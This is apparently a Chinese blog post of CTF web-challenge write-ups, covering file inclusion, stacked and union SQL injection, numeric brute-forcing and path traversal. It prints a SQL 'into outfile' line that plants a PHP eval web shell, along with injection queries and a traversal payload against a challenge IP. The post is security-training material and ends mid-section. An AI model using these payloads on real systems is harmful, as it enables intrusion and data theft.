<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.json"};
  </script>

  <meta name="description" content="baby-web  知识点：index.php   url后是1.php">
<meta property="og:type" content="article">
<meta property="og:title" content="webctf解题">
<meta property="og:url" content="http://example.com/2021/01/12/web%E9%AB%98%E6%89%8B/index.html">
<meta property="og:site_name" content="Y0ng的博客">
<meta property="og:description" content="baby-web  知识点：index.php   url后是1.php">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133056990.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133327797.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133422417.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021011213342850.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133533547.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133552852.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133609172.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133623396.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133652344.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133707391.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133719416.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133751360.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133813868.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021011213383018.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133852864.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112133903466.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134011251.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134018180.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134025717.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134050427.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134059667.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021011213411518.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134124304.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134135422.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134147467.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134157792.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134239994.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134249638.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134320593.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134331364.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134346610.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021011213440941.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134420640.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134433350.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134506231.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021011213451853.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134537598.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021011213455450.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134615858.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134624457.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134651180.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134720215.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134822267.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134827684.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134848365.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134904330.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134910341.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021011213492317.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134934798.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134944604.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112134952545.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112135008888.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">
<meta property="article:published_time" content="2021-01-12T05:52:55.840Z">
<meta property="article:modified_time" content="2021-01-26T19:01:31.001Z">
<meta property="article:author" content="程勇胜">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20210112133056990.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70">

<link rel="canonical" href="http://example.com/2021/01/12/web%E9%AB%98%E6%89%8B/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>webctf解题 | Y0ng的博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Y0ng的博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">0</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">10</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">48</span></a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/01/12/web%E9%AB%98%E6%89%8B/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/cys.jpg">
      <meta itemprop="name" content="程勇胜">
      <meta itemprop="description" content="花有重开日，人无再少年">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Y0ng的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          webctf解题
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-01-12 13:52:55" itemprop="dateCreated datePublished" datetime="2021-01-12T13:52:55+08:00">2021-01-12</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-01-27 03:01:31" itemprop="dateModified" datetime="2021-01-27T03:01:31+08:00">2021-01-27</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <ol>
<li><p>baby-web</p>
<p> 知识点：index.php<img src="https://img-blog.csdnimg.cn/20210112133056990.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</li>
</ol>
<p>url后是1.php</p>
<a id="more"></a>
<p>修改为index.php<br><img src="https://img-blog.csdnimg.cn/20210112133327797.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<ol start="2">
<li><p>Training-WWW-Robots</p>
<p> 知识点：robots.txt协议，在网络爬取网站时，一个约定的规矩，规定了哪些不能爬取<br><img src="https://img-blog.csdnimg.cn/20210112133422417.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/2021011213342850.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</li>
</ol>
<ol start="3">
<li><p> php.rce</p>
</li>
<li><p> web php_include（文件包含漏洞）<br><img src="https://img-blog.csdnimg.cn/20210112133533547.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</li>
</ol>
<blockquote>
<p>  御剑扫后台进去第一个<br><img src="https://img-blog.csdnimg.cn/20210112133552852.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210112133609172.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</blockquote>
<p>select “&lt;?php eval(@$_POST[‘shell’]);?&gt;“ into outfile ‘/tmp/22.php’</p>
<p><img src="https://img-blog.csdnimg.cn/20210112133623396.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<ol>
<li><p>supersql（sql注入）</p>
<p> 知识点：sql注入，需要学sql语句</p>
<p> <a target="_blank" rel="noopener" href="https://www.cnblogs.com/jokervip/p/12483823.html">https://www.cnblogs.com/jokervip/p/12483823.html</a></p>
<p> 一进去如下图：<br><img src="https://img-blog.csdnimg.cn/20210112133652344.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</li>
</ol>
<p>发现提交的1’也可以达到与1同样的效果，可以使用sql注入 堆叠注入<br><img src="https://img-blog.csdnimg.cn/20210112133707391.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>获取数据库目录（1’;show databases;）(堆叠注入)</p>
<p><img src="https://img-blog.csdnimg.cn/20210112133719416.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>（1’;use supersqli;show tables;）查看表：<br><img src="https://img-blog.csdnimg.cn/20210112133751360.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>想法获取表（1919810…）中的列：<br>（1’;use supersqli;show columns from `1919810931114514`;）</p>
<p><img src="https://img-blog.csdnimg.cn/20210112133813868.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>至此supersqli目录下的191…表下的flag列呈现在眼前，想法查看flag的内容即可</p>
<p>我们已经知道列flag是表191的第一个文件使用handler：</p>
<p>(1’;handler `1919…` open;handler `1919…` read first;)<br><img src="https://img-blog.csdnimg.cn/2021011213383018.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>得到flag</p>
<p>6.ics-06（数字爆破）</p>
<p>知识点：使用bs尝试爆破简单的数字密码，使用intruder模块</p>
<p>题目说报表中心，就点报表中心<br><img src="https://img-blog.csdnimg.cn/20210112133852864.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>Id=1，可以尝试爆破，直接burpsuite</p>
<p><img src="https://img-blog.csdnimg.cn/20210112133903466.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<blockquote>
<p>   Id=2333</p>
</blockquote>
<p>7.Warmup</p>
<blockquote>
<p>  知识点：代码审计</p>
</blockquote>
<p>疑问：为何file=source.php不可以直接绕过第一个if<br><img src="https://img-blog.csdnimg.cn/20210112134011251.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210112134018180.png" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210112134025717.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>解：先看源码有 source.php先访问一下</p>
<p>还有个hint.php访问得到</p>
<p><img src="https://img-blog.csdnimg.cn/20210112134050427.png" alt="在这里插入图片描述"></p>
<p>返回 代码审计：</p>
<p><img src="https://img-blog.csdnimg.cn/20210112134059667.png" alt="在这里插入图片描述"></p>
<p>定义一个白名单，判断：变量没有定义或者变量不是字符串，false</p>
<p><img src="https://img-blog.csdnimg.cn/2021011213411518.png" alt="在这里插入图片描述"></p>
<p>第二个if语句判断$page是否存在于$whitelist数组中，存在则返回true</p>
<p><img src="https://img-blog.csdnimg.cn/20210112134124304.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>第三个if语句判断截取后的$page是否存在于$whitelist数组中，截取$page中’?’前部分，存在则返回true</p>
<p><img src="https://img-blog.csdnimg.cn/20210112134135422.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>第四个if语句判断url解码并截取后的$page是否存在于$whitelist中，存在则返回true</p>
<p>Payload：<a target="_blank" rel="noopener" href="http://220.249.52.134:43797/source.php?file=source.php">http://220.249.52.134:43797/source.php?file=source.php</a>?<br><img src="https://img-blog.csdnimg.cn/20210112134147467.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>发现图片不见<br><img src="https://img-blog.csdnimg.cn/20210112134157792.png" alt="在这里插入图片描述"></p>
<p>../../../../../../ffffllllaaaagggg</p>
<p> 8.Newscenter</p>
<blockquote>
<p>  知识点：sql注入</p>
</blockquote>
<p> 感觉是sql注入,   先弄出来前面有几字段数使用order by<br><img src="https://img-blog.csdnimg.cn/20210112134239994.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<blockquote>
<p>  发现4的话页面就没了，说明有3个字段数<br><img src="https://img-blog.csdnimg.cn/20210112134249638.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</blockquote>
<blockquote>
<p>  1’ union select 1,2,table_name from information_schema.tables<br>  #查表名(1,2是为了凑够字段数)<br><img src="https://img-blog.csdnimg.cn/20210112134320593.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzUzMjYzNzg5,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
</blockquote>
<blockquote>
